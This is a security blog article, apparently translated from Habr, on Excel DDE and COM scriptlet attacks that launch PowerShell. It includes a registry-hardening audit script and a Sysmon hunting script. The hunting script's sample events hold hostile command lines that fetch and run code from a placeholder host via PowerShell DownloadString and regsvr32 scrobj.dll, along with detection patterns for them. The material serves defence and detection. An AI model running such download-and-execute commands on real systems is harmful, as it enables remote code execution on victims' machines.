Elusive Malware Adventures Part V: More DDE and COM Scriptlets


This article is part of the Fileless Malware series. All other parts of the series:

In this series of articles, we explore attack methods that require minimal effort on the part of the attacker. In the previous article we showed that it is possible to paste the code itself into a DDE auto-field payload in Microsoft Word. By opening such a document attached to a phishing email, an unwary user lets the attacker gain a foothold on their computer. However, at the end of 2017, Microsoft closed this loophole for DDE attacks.
The fix adds a registry entry that disables DDE functions in Word. If you still need this functionality, you can restore it by re-enabling the old DDE capabilities.

However, the original patch only covered Microsoft Word. Do such DDE vulnerabilities exist in other Microsoft Office products that could also be exploited in no-code attacks? Of course they do. You can find them in Excel, for example.

Night of the Living DDE

Last time I stopped at the description of COM scriptlets; I promise I will get to them later in this article.

In the meantime, let's look at another evil side of DDE, in its Excel version. Just like in Word, some hidden DDE features in Excel let you execute code effortlessly. As a user who grew up with Word, I was familiar with fields but knew little about DDE functions.

I was amazed to learn that in Excel I can call a shell from a cell as shown below:


Did you know that this was possible? Personally, I didn't.

This ability to launch a Windows shell is courtesy of DDE. You can think of many other applications that you can connect to using Excel's built-in DDE functions. Are you thinking the same thing as me?

Let's have our in-cell command start a PowerShell session that then downloads and executes the linked code, a technique we have already used before. See below:


Just paste a little PowerShell to load and run remote code in Excel

But there is a catch: for this formula to work, you must explicitly enter it into the cell. So how can a hacker get this DDE command executed remotely? The answer is that when an Excel spreadsheet is opened, Excel tries to update all of its DDE links. The Trust Center settings have long offered the ability to disable this, or to warn the user when links to external data sources are updated.


Even without the latest patches, you can disable automatic DDE link updating

Microsoft itself originally advised companies in 2017 to disable automatic link updates in order to prevent DDE attacks in Word and Excel. In January 2018, Microsoft released patches for Excel 2007, 2010 and 2013 that disable DDE by default. This Computerworld article describes all the details of the patch.

Well, what about the event logs?

So Microsoft has, in the end, abandoned DDE for Word and Excel, finally acknowledging that DDE is more a bug than a feature. If for some reason you have not yet installed these patches, you can still reduce the risk of a DDE attack by disabling automatic link updates and enabling the options that prompt users before links are updated when documents and spreadsheets are opened.
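The registry controls behind the Word patch and the Trust Center link-update options can be checked and enforced programmatically rather than clicked through per user. The Python below is an added example, not code from the article or from Microsoft: it parses a `reg export` of a user's Office hive, reports which DDE-hardening values are absent or weaker than required, and renders the gaps as a .reg file. The value names and data (AllowDDE under Word\Security from ADV170021; DontUpdateLinks and WorkbookLinkWarnings from Microsoft Security Advisory 4053440) are taken from those advisories and should be treated as an assumption to verify against your own Office build; the sample export is constructed.

```python
"""Audit an Office registry export for the DDE-hardening values and render a remediation .reg.

Added example, not code from the article. Value names and hardened data come from Microsoft
Security Advisory 4053440 (DontUpdateLinks / WorkbookLinkWarnings) and ADV170021 (AllowDDE);
treat them as an assumption to verify against your own Office build."""
import re

HIVE = r"HKEY_CURRENT_USER\Software\Microsoft\Office"
OFFICE_VERSIONS = ["12.0", "14.0", "15.0", "16.0"]  # Office 2007, 2010, 2013, 2016/365

# (key path below HIVE\<version>, value name, hardened DWORD)
HARDENING = [
    (r"Word\Security", "AllowDDE", 0),               # 0 = Word's DDE client disabled
    (r"Word\Options", "DontUpdateLinks", 1),         # no automatic link update on open
    (r"Word\Options\WordMail", "DontUpdateLinks", 1),
    (r"Excel\Security", "WorkbookLinkWarnings", 2),  # 2 = disable automatic update of links
    (r"Excel\Options", "DontUpdateLinks", 1),
]

SECTION_RE = re.compile(r"^\[(.+)\]$")
DWORD_RE = re.compile(r'^"([^"]+)"=dword:([0-9a-fA-F]{8})$')


def parse_reg_export(text):
    """Parse `reg export` output into {key: {value_name: int}}; only DWORDs matter here."""
    snapshot, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        m = SECTION_RE.match(line)
        if m:
            current = m.group(1)
            snapshot.setdefault(current, {})
            continue
        m = DWORD_RE.match(line)
        if m and current is not None:
            snapshot[current][m.group(1)] = int(m.group(2), 16)
    return snapshot


def audit(snapshot, versions=OFFICE_VERSIONS):
    """Return (key, name, current, required) for every setting that is absent or not hardened."""
    findings = []
    for ver in versions:
        for suffix, name, required in HARDENING:
            key = f"{HIVE}\\{ver}\\{suffix}"
            current = snapshot.get(key, {}).get(name)   # None when the value does not exist
            if current != required:
                findings.append((key, name, current, required))
    return findings


def remediation_reg(findings):
    """Render the findings as a .reg file that `reg import` can apply."""
    by_key = {}
    for key, name, _current, required in findings:
        by_key.setdefault(key, []).append((name, required))
    lines = ["Windows Registry Editor Version 5.00", ""]
    for key, values in by_key.items():
        lines.append(f"[{key}]")
        lines.extend(f'"{name}"=dword:{data:08x}' for name, data in values)
        lines.append("")
    return "\n".join(lines)


# Constructed sample: a user hive where Word still allows DDE and Excel updates links silently.
SAMPLE_EXPORT = r"""Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Security]
"AllowDDE"=dword:00000002

[HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Security]
"WorkbookLinkWarnings"=dword:00000000
"""

if __name__ == "__main__":
    findings = audit(parse_reg_export(SAMPLE_EXPORT), versions=["16.0"])
    for key, name, current, required in findings:
        print(f"{key}\\{name}: current={current} required={required}")
    print(remediation_reg(findings))
```

`reg export` writes UTF-16 with a byte-order mark, so read the file with `encoding="utf-16"` before handing it to `parse_reg_export`. Because these are per-user keys, the audit has to be run for each user (or against each loaded user hive), and since Office only creates the Security and Options keys on demand, a missing value is reported as a finding rather than silently treated as safe.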

Now the million dollar question: If you are a victim of this attack, will PowerShell sessions launched from Word fields or Excel cells show up in the log?


Question: Are PowerShell sessions launched via DDE logged? Answer: yes

When PowerShell sessions are launched directly from an Excel cell rather than from a macro, Windows still logs these events (see above). At the same time, I can't claim it will be easy for the security team to connect the dots between the PowerShell session, the Excel document and the email message and work out where the attack began. I'll come back to this in the last article of my never-ending series on elusive malware.

How is our COM?

In the previous article I touched on the topic of COM scriptlets. In themselves they are a convenient technology that lets you pass code, say JScript, simply as a COM object. But then hackers discovered scriptlets, which let them gain a foothold on a victim's computer without any extra tools. This video from the Derbycon conference shows built-in Windows tools such as regsvr32 and rundll32 taking remote scriptlets as arguments, so that attackers essentially carry out their attack without malware at all. As I showed you last time, you can easily run PowerShell commands from a JScript scriptlet.

It turned out that one very smart researcher found a way to run a COM scriptlet in an Excel document. He discovered that when he tried to insert a link to a document or picture into a cell, a certain package was inserted into it. And this package quietly accepts a remote scriptlet as input (see below).


Boom! Another stealthy, silent method to launch a shell using COM scriptlets

After a low-level inspection of the code, the researcher found that this is actually a bug in the package software: it was intended only to reference files, not to run COM scriptlets. I'm not sure whether a patch for this vulnerability exists yet. In my own research on an Amazon WorkSpaces virtual desktop with Office 2010 preinstalled I was able to reproduce the result; when I tried again later, however, it no longer worked.
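Two detection questions run through the logging section and the COM scriptlet section above: a DDE-launched PowerShell session does appear in the process-creation log, and regsvr32 or rundll32 taking a remote scriptlet as an argument is visible there too, but somebody still has to connect that record back to the Excel or Word document and to the email it arrived in. The Python below is an added example, not code from the article: it assumes Sysmon Event ID 1 records exported as JSON lines with Sysmon's own field names (UtcTime, ProcessGuid, ParentProcessGuid, Image, ParentImage, CommandLine), classifies each record, and walks the parent chain from the hit back to the Office host, the document it opened and, where present, Outlook. The six records are constructed for the example; the GUIDs and the TEST-NET address are placeholders.

```python
"""Flag Office-launched shells and remote COM scriptlets in process-creation telemetry and
walk each hit back up the parent chain to the document and the mail client.

Added example, not code from the article. Assumes Sysmon Event ID 1 exported as JSON lines
with Sysmon's own field names; the sample records are constructed, not real telemetry."""
import json
import ntpath
import re

OFFICE_HOSTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# Built-in binaries that DDE fields/cells and scriptlet loaders hand control to.
SHELL_HOSTS = {"cmd.exe", "powershell.exe", "regsvr32.exe", "rundll32.exe",
               "mshta.exe", "wscript.exe", "cscript.exe"}
SCRIPTLET_HOSTS = {"regsvr32.exe", "rundll32.exe"}

URL_RE = re.compile(r"https?://", re.I)
# PowerShell primitives behind "download the link and run it".
PS_REMOTE_RE = re.compile(r"downloadstring|downloadfile|invoke-webrequest|invoke-expression|\biex\b", re.I)
# A quoted Word/Excel document path on an Office host's command line.
DOC_RE = re.compile(r'"([^"]+\.(?:xls[xmb]?|doc[xm]?))"', re.I)


def basename(path):
    """Lower-cased file name of a Windows path, portable via ntpath."""
    return ntpath.basename(path).lower()


def classify(ev):
    """Return the list of reasons a single process-creation event is suspicious (empty if none)."""
    image, parent = basename(ev["Image"]), basename(ev["ParentImage"])
    cmd = ev.get("CommandLine", "")
    reasons = []
    if parent in OFFICE_HOSTS and image in SHELL_HOSTS:
        reasons.append(f"office-spawned:{parent}->{image}")
    if image in SCRIPTLET_HOSTS and (URL_RE.search(cmd) or "scrobj" in cmd.lower()):
        reasons.append("remote-scriptlet-args")      # scrobj.dll is the COM scriptlet host
    if "powershell" in cmd.lower() and PS_REMOTE_RE.search(cmd):
        reasons.append("ps-download-exec")
    return reasons


def ancestry(ev, by_guid):
    """Return [ev, parent, grandparent, ...] as far as the collected events allow."""
    chain, seen = [ev], {ev["ProcessGuid"]}
    while True:
        parent_guid = chain[-1].get("ParentProcessGuid")
        if parent_guid not in by_guid or parent_guid in seen:
            return chain
        seen.add(parent_guid)
        chain.append(by_guid[parent_guid])


def hunt(jsonl):
    """Run classify() over every record and enrich hits with their process chain and document."""
    events = [json.loads(line) for line in jsonl.splitlines() if line.strip()]
    by_guid = {e["ProcessGuid"]: e for e in events}
    alerts = []
    for ev in events:
        reasons = classify(ev)
        if not reasons:
            continue
        chain = ancestry(ev, by_guid)
        names = [basename(e["Image"]) for e in chain]
        document = None
        for e in chain:                          # nearest ancestor that opened a document
            m = DOC_RE.search(e.get("CommandLine", ""))
            if m:
                document = m.group(1)
                break
        alerts.append({"time": ev["UtcTime"], "chain": " <- ".join(names), "reasons": reasons,
                       "document": document, "mail_origin": "outlook.exe" in names})
    return alerts


# Constructed sample records (GUIDs and 198.51.100.5 are placeholders).
SAMPLE_EVENTS = r'''
{"UtcTime": "2018-02-05 09:12:01", "ProcessGuid": "{G-1}", "ParentProcessGuid": "{G-0}", "Image": "C:\\Program Files\\Microsoft Office\\root\\Office16\\OUTLOOK.EXE", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "OUTLOOK.EXE"}
{"UtcTime": "2018-02-05 09:14:37", "ProcessGuid": "{G-2}", "ParentProcessGuid": "{G-1}", "Image": "C:\\Program Files\\Microsoft Office\\root\\Office16\\EXCEL.EXE", "ParentImage": "C:\\Program Files\\Microsoft Office\\root\\Office16\\OUTLOOK.EXE", "CommandLine": "\"C:\\Program Files\\Microsoft Office\\root\\Office16\\EXCEL.EXE\" \"C:\\Users\\alice\\AppData\\Local\\Microsoft\\Windows\\INetCache\\Content.Outlook\\Q1ABCD\\invoice.xlsx\""}
{"UtcTime": "2018-02-05 09:14:41", "ProcessGuid": "{G-3}", "ParentProcessGuid": "{G-2}", "Image": "C:\\Windows\\System32\\cmd.exe", "ParentImage": "C:\\Program Files\\Microsoft Office\\root\\Office16\\EXCEL.EXE", "CommandLine": "cmd.exe /c powershell -c \"IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.5/x.ps1')\""}
{"UtcTime": "2018-02-05 10:02:10", "ProcessGuid": "{G-4}", "ParentProcessGuid": "{G-0}", "Image": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "\"C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE\" /n \"C:\\Users\\alice\\Downloads\\quote.docx\""}
{"UtcTime": "2018-02-05 10:02:15", "ProcessGuid": "{G-5}", "ParentProcessGuid": "{G-4}", "Image": "C:\\Windows\\System32\\regsvr32.exe", "ParentImage": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE", "CommandLine": "regsvr32.exe /i:http://198.51.100.5/x.sct scrobj.dll"}
{"UtcTime": "2018-02-05 10:30:00", "ProcessGuid": "{G-6}", "ParentProcessGuid": "{G-0}", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "powershell.exe -c Get-ChildItem C:\\Temp"}
'''

if __name__ == "__main__":
    for alert in hunt(SAMPLE_EVENTS):
        print(alert)
```

The first hit resolves to `cmd.exe <- excel.exe <- outlook.exe` with the workbook path under Content.Outlook, which is the dots the article says are hard to join by hand; the benign PowerShell run from Explorer produces nothing. Sysmon must be configured to log command lines (it does by default) and, for the chain walk to reach Outlook, to retain the Office host's own creation event rather than filtering it out as noise.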

I really hope I have told you a lot of interesting things, and at the same time shown that hackers can penetrate your company in one way or another using similar methods. Even if you install all the latest Microsoft patches, hackers still have plenty of tools to gain a foothold in the system, from the VBA macros I started this series with to malicious payloads in Word or Excel.

In the final (I promise) article in this saga, I'll talk about how to provide smart protection.

Source: habr.com
